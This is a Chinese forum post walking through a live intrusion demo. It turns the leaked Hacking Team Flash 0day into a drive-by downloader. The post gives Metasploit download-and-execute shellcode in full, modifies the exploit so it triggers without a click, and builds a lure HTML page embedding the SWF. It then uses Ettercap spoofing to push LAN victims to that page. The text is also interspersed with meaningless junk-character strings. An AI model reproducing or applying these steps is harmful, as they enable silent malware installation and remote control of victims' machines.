找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1600|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- M1 p. T* b0 P+ H9 o 三、flash 0day之手工代码修改制作下载者实例入侵演示 5 P6 V) D' B! U( s+ p4 a

0 C% I3 ]6 n% m8 z9 M

+ i; e( ?. d: q x7 g V- z 利用到的工具: ) ]: f' m: j8 M6 o( ^

' n% Q: s4 z! i y! N% b1 P

" \! S3 g! x6 p( P6 ~. [4 X Msf 1 K& B. t# l) v

0 X/ v/ [2 \! Z4 y; K" g9 d

" N( ?3 P" E9 z) s* |. x/ i7 d Ettercap 4 g+ i. h- T4 t% y0 _& I8 |% v

, }( m6 K% t! e$ c! F3 y

& F: j6 F$ p b' ]* [# N Adobe Flash CS6 . l5 ~* D9 K0 Q

% D1 i6 }7 m7 C3 a) s; m

/ q3 b, \ y( u, s3 d, U Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ; C* X1 M6 B* x5 T v% Z4 I" l9 t

, d1 l+ [ k8 [

4 i# Z- T8 ~3 l( z 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options $ \5 D. C- F) k4 F

U4 L+ O- x: Y/ O8 ~. k1 w, }

% q& @' A0 q" U2 P1 D- a 如图: - O8 ~3 d8 e/ X- h# n

8 A/ U+ H/ N& j) h

9 i. ?4 K3 O% r1 |( v   6 B/ t2 M' e" h& i O

; S$ Q" z: D4 w% |- R1 o' V8 E

/ {; A: A6 Z5 h2 J6 Z5 H   1 I# F5 a$ P# H d# ~

1 u3 L$ ]7 X% ^9 ]5 ]6 ^

! M0 r* }. x; j- _ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 h8 U' z% d) ?: w( e

6 D+ A; K) P- y8 M- z+ A4 r

! l5 s, O! r% u- {6 W   / O; f+ A2 ?8 R3 K( n0 ^" j- J

* Q2 j' X- M! N% `6 v$ I; H) `

$ G B/ B8 ?! L( c   ! I9 ^; [0 U! L' }( c& V& [- y

2 n, n( O# R Z6 S! i Y

. C% S! q$ O$ G 然后执行generate -t dword生成shellcode,如下: ( p8 Y0 @% O) q0 V

5 |& F0 O! X! g& Y N

7 O( _- q* d6 a X2 l7 M0 Q0 y0 U   4 A7 l4 x A; M7 g9 w. [, w$ S0 q

" _8 Q1 A4 ]7 F* m9 x

8 F% R7 x3 U5 z5 @$ @/ ?$ L; V" w 复制代码到文本下便于我们一会编辑flash exp,如下: 3 X! c- F- `, H( q$ m5 q5 q6 g

% `$ b7 u! N# u

( J* r4 ~5 x K/ X: {' a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ; F. r* d% x0 U& }4 j; @

' J$ P9 N& l- z& B9 c" D9 p. p

2 Q6 Y0 H) s9 y$ z5 h9 ` 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, $ M I$ Z' a5 _+ o

6 [9 e1 Q& u, j- W M) {9 B/ z8 r; z/ O

' ~ r- S `, L0 @ A 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + E4 L5 e% `& m/ N0 U

( ^$ B! k7 p! B5 _3 y# O

! y$ X' X+ [7 M7 x5 J q 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, & o) p0 z+ K$ W+ P% i) g

/ v/ N1 U7 l! {4 ~: D

: K- M! j* g) n% m! y: o1 Z+ _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ) Z$ ]7 a5 Y* n/ T& R( J

- G/ o* O0 K/ B5 x" }+ `* G

V6 J1 k8 d$ c% y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 |$ ]+ E; F1 R

* V# T) b$ S3 Y( S7 x9 U! m

5 S: `9 A- o* I9 L 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 g1 {3 r ?! |; f; X4 n" }

, y" |& M" U2 W4 m

8 O. F' o" Z: T# R 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 {" Z i' g) |0 G, [! G3 H3 I: H

5 W# B( F. r) z/ p' M- m2 H% t

) h& n9 ^% V3 w M$ w" I 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 L7 E9 c9 F: ^1 ^3 y& Y7 v

" r. T8 F) z! d" ~+ M9 ?

) l9 V' B1 S* n0 U, K/ l 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & U( T; ]( N e5 {

; h; I- I6 K" I: m$ {

2 l5 g0 O$ m& @- k m$ Y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 T- O# _: K4 d) _

" a9 z# s5 v" }* \, Q- @8 a3 z. }

: c$ q1 |& M0 K. l* J) u& W 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 [: ]5 h: O q e% Y5 i* W" [/ a

& [( o8 \* H( f) s

4 k4 c2 F. q7 E1 }4 L 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 2 b. `; P; d2 s9 l' F

( |0 [* r, d# _* S/ t0 g1 R

* Z( D- C+ k+ c( E9 ` 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 I& {% B3 M; Q3 J

2 U- W8 }6 z! d% v: a, H6 p

4 j) g0 m5 G4 f \8 B   / t' B; `* P0 Y8 c! I

( D9 x1 S. n. a2 [" y

; w, a2 u, ~: k6 ~0 ~   ( _$ W1 K4 Z6 ]' [: H

& Y+ {. Y! k6 ?' z- G( B

1 u z& m! s# ?1 o+ k+ ]; Z 下面我们来修改flash 0day exp,需要修改三个文件,分别为: : J9 u9 ~9 V: N

2 t4 e) O2 t: \4 @ Z

" ~9 P# Z! G3 Y3 Q4 v- Z* u3 r: Q   5 m9 w2 P' s2 j( m" o

$ p1 \' G; [9 f& a* m' G

+ G! G$ \$ s$ o$ l y 先修改ShellWin32.as,部分源代码如图: ; i4 x: i I; l4 q- B

* a. l6 K$ _* B2 o4 O

6 |9 G, i8 p( P/ y3 C   1 V; }7 C. {8 Q# `! ~- R! l4 z

% o+ o$ | Z; l: y8 }( G8 _

! Y; d5 n2 {2 z- J. `# } 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 2 W& \# @; W: y8 B, g A

7 o+ ]" J' t( D' j/ Z Z* D- R% |1 J

& V/ a; }. y) f! g* X9 R+ U   " n. C* m7 o3 |/ b. X

) q1 l! t4 p! g' U- r3 t+ J

1 f% k; [' B; l' j' }: N% | 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 2 u! W# t" |- i! l2 e

. t3 |9 M2 i8 r% {$ l5 O

' D6 ?8 e. r' U   ! {% w* R/ F u9 n% q

$ G+ S+ b4 k# b6 @0 v) h( l

' l ]* a; x: k6 x 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 T3 j! g9 ?9 I- I- Q

% T4 S. {0 E9 u. E

( q- y0 J1 P/ ?9 ^" F   $ g, g; H* U: K2 z, D

$ U+ D) ~, O: a: G% v

3 G! f8 c) |) k' d   , L7 d! }0 m# [! Z: W! h2 G

2 x$ Z5 w# ~) ~( S! d6 ?9 M* W

7 ]( c) P" y; l' |6 v   6 P' `2 Y$ G. B1 j8 u j" v

: E) t) @/ |2 x3 a/ {7 p

* A$ F {" Q/ q J! X/ H0 B' F2 M 然后点保存,下面我们来编译一下,打开 / P' ]8 Z- M1 ?

$ ?5 @1 N" I/ x0 k. z4 b w# R: z

% I2 i; j3 [" Q' H) [ exp1.fla然后点文件-发布,看看编译没错误 7 ]; ?3 f- f: h$ ?# b: }, P$ S

1 Z& e, v5 k. k) [5 j8 \7 ~

" q! k( u' I4 g' V3 p8 c   - s+ L+ T- f5 z

# M" S! I1 I7 E! [. B+ o

! h# E7 k; A% k9 {1 m* |* K5 [   2 a' T: O" L* ^/ u

& |( x3 E3 [% ?8 j% j8 K

' W, t+ y4 F& y) b   8 Q( n. i9 L% F6 w5 `* Q( W

- ]# f n Q2 s, n8 g( A% N$ g

, L" `+ C: x, Y5 Q" v8 c   5 Q6 a g; R" Y! D

9 D* ?. T$ ?# p; v! J- m

1 _; h% Z( e! a+ l% }& o4 B ~ 然后我们把生成的 + |# a% F1 a& `3 e/ v: |

' O2 J& o9 |2 C/ p# i

% D0 g; e$ o, f. n exp1.swf丢到kailinux /var/www/html下: 9 f& I- [' Z* K7 u/ G% n% P1 R1 ^; T

! ^* Y8 `$ @9 j6 U( S% l, q$ J

, e+ G7 t+ V, v% O1 Z+ j 然后把这段代码好好编辑一下 8 b! m4 E% f; o" d$ I* Y: s

9 n9 Y- i* i+ _+ @. c

/ \/ }7 g% v: K* K! F   8 v$ \) @# j6 I1 @( }* A) i1 [# _

+ j* U6 b3 [! r$ Y, [( P

2 G' V7 Z9 j) m7 q+ O   : K) E( `+ J$ K$ v3 [

]( j1 }3 G9 r, |& P" {8 |

' P: [+ f, [2 H3 x, |, c6 G2 K7 ]   , w' b8 h* H; H( J3 }$ \

/ T7 j3 R: h) R, B1 ?8 A

8 U1 E; `" [3 Q7 _+ M/ Q   9 R6 l3 W+ P6 N( x

0 y+ Q. ^" e3 { a5 _" J6 ` ]

! k: u/ A2 w; d2 |$ A" w' D' M   1 ~4 t: J1 A9 D7 n! W

1 ~5 \- }, z# n+ b! @

3 n) x! R$ P. K- T   3 h3 J! o. {2 F2 j( W2 K

# r; L8 V2 ?9 G* [- ~/ B

2 [/ L5 U+ H# t8 G- u) R <!DOCTYPE html> * N9 S) \; e; j R) Z B

1 c, J6 I( @: n o; [. C

# m/ ^* ]. S! Z# ]3 g) E <html> ; G1 a, b- R7 I0 z `" L& k

6 T2 Z, H2 T9 T1 a

% d( V( P* A* {* W3 A7 D: c <head> 0 u1 F$ K# F$ j- L4 d5 W' y5 R

7 ]" i0 }1 k% C% `

* O7 |8 b; J- h4 C2 Z <meta http-equiv="Content-Type" content="text/html; % R5 V! W3 ]3 N* }; m! n

* z9 k* N# i2 |% a2 a' j

8 d! P9 d4 o; O5 H' N charset=utf-8"/> 6 S7 \/ P9 w% d' K# \" W

( T, u( h: }4 j Z6 h7 n

6 R2 _, s4 k/ j( \* q0 d+ H </head> # x( K) `, J! |6 \! t( _! b5 H

& G5 G/ b3 T8 `5 E' n0 h" a7 ~

9 ~, ~0 E, O J; f <body> / |. P1 w& s. K0 K$ a7 ]! Z; H

. `* R% T% D" `! u" G& x- ^

) O: H8 R) T' s <h2> Please wait, the requested page is loading...</h2> 3 P/ a, `; m2 _9 a

: u' o& {0 R i# n

; q# O& z1 f' O! i" G: }" X# f <br> * U f( M! L0 [ f% s

6 d# y V# {+ A; U5 n4 L

+ A2 D' w8 [4 U+ p( V2 N5 z <OBJECT / y3 A% B2 s8 e/ p% Y

- ?" o2 B( P# {7 z7 f

) e$ _/ _# G. z7 {" _7 g h classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie x! E0 L1 z" U2 J

5 O3 J( Y: A% I* z4 X

$ q& y7 t( A3 F VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : ^8 n4 [1 {: Q% i3 A

2 _7 H# _) @7 X1 E+ d; L ?2 H) w& K

0 }- E$ u: B0 l U! J </body> ; G# K6 z' L0 _; ^3 A

6 W# b0 A8 x5 G+ n+ w( u/ [/ q1 r

0 g" e0 n+ X! _" _6 ?) Z <script> ! i5 y. b7 J6 A$ ^

. r9 t6 I7 e" o+ O3 W8 a

3 B7 j0 e- c% H6 {# x( }' s1 ]" Q     setTimeout(function () { & f+ g6 t! P; b- T% Y3 \* M V

+ M6 P6 v O2 T/ O2 F3 m1 ~" i

7 S* V- l K! x3 X6 ^" Z6 \4 k3 G          ! ]0 ]# F% y- ~

) R# e& f( t X' f9 q

8 o. ~4 r* _. _9 ~2 \2 J# y window.location.reload(); 8 {7 ]4 N4 B& R6 `4 k- p9 M5 s/ O

7 ?* g: n6 J% H$ Q$ x# |

" x& p$ q/ E; F     }, 10000); % X) e: p+ x8 R0 b8 P* _

3 P/ M/ G* @( C

' @; ~6 ?7 L2 I" I- c$ G% ^0 m$ T   ( j% s$ u4 C" I+ J4 l

" v( ^5 j8 ?7 Y* C

+ ?+ m& k' _) t+ y </script> 1 U$ t' w* ~0 m

3 C& }4 h6 [4 t2 U* o& w) o9 G

( z# P' h/ I* b+ v" p' r </html> t2 t; t# E- f) A2 f3 m

+ W3 j; m: [+ \ @

1 _) t7 m2 B. w# A   % O, E* d2 j0 r U2 q( b& s

! \) d8 j) L @6 `' A1 m" C

8 ?; h+ I6 ?# m- w6 C4 A, J 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 6 @; F. e9 t) l. [0 M Y) f( ?

8 w# D; G0 _7 Z1 U

: r8 {3 S! M/ g   $ ?- n9 G4 R3 r) m7 w& n

% I; B& u" v0 O( s9 ~4 Q5 t& {8 h0 E

# O$ d2 F+ J4 D% \3 |1 F   $ i k6 C& A L2 B0 E

/ b* F9 g8 T# b

1 k) ~# Q4 ~3 h4 P* q/ F) I   , c0 `: D" x% a, @4 e

; E7 b3 g& I. t I3 W0 K

; I$ e% v, l6 B8 e f   / E: o5 G( H& z! _6 C

# b z0 D% D, ^) u

) l0 F( C+ a0 \+ z7 E1 f! u" w   % ~- X; _% H% q$ ]& M

# Q9 z* v: w" S% [

! c C i& V' E/ f" U5 O 下面我们用ettercap欺骗如图: ( q' h) a" u: d! m

Z# y2 Q0 o" r0 R) X0 M

, U- B5 \- Q2 M   ! a3 A# N- V. s4 T

+ I3 o3 t' D. h6 A( Z$ R% q) [

5 V j7 W) Q4 _ J6 I N+ x   9 S& h ]+ |4 r/ G/ M, p R

8 h3 w4 S& K8 M5 w# I5 N4 }* J

1 }; n" P$ X0 {+ H/ B7 p' ?4 n8 ?1 o% V 下面我们随便访问个网站看看: ' K% y) C$ A7 @

$ o# x ~5 T; x( a

l: y! @; t! \" i) }& Z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 l! V/ ~* n1 Y' B. U0 U# O5 _

6 `& a: A6 G2 H( r( o/ d# n& a3 x& ^3 k

. f! ~6 [4 w# U. E. a$ o$ i5 \# k   ' B! @2 L9 Y" v7 I) i' E8 k6 ~

/ `! F" r1 v7 z

6 m5 A# ?+ }" k1 B/ ^& d 我们看另一台, / H5 D& z% P1 v

) Y8 F" I Y! } |

5 S2 X1 y# c0 p2 { 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 + |' i/ J" U9 S9 h/ w; c+ @

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表